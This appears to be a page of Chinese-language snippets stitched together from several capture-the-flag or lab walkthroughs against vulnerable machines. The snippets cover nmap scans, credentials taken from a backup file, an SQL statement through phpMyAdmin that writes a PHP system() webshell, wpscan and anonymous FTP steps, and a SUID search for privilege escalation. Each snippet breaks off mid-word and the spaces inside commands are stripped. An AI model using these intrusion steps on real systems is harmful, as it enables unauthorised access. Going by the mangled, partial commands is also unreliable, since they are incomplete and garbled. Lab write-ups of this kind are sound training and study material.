kali：192.168.111.111靶机：192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak，下载后查看获得mysql账号密码登录9000端口的phpmyadmin，执行sql语句写入webshellselect'<?phpsystem($

主机发现sudonmap-sn192.168.28.0/24tcp端口扫描sudonmap-sT--min-rate10000-p-192.168.28.33-oAnmapscan/portstcp版本扫描sudonmap-sT-sC-sV-O-p22,80192.168.28.33-oAnmapscan/detial udp扫描sudonmap-sU--top-ports20-p-192.168.28.33-oA

kali：192.168.111.111靶机：192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130查看网站首页源码访问development目录，提示存在一个流量包查看流量包发现另一个网站路径：/developmentsecretpage/directortestpagev1.php访问该路

kali：192.168.111.111靶机：192.168.111.188信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.188访问web发现是wordpress网站使用wpscan收

kali：192.168.111.111靶机：192.168.111.187信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.187ftp匿名登陆发现两个文件ftp192.168.111.1

kali：192.168.111.111靶机：192.168.111.178信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.178访问80端口发现存在一个目录访问该目录发

有时候用普通用户登录目标机后用sudo-l发现该用户什么命令都不能sudo解决方法如下先用find/-perm+60002>/dev/null|grep'/bin/'看看能用什么进程来提权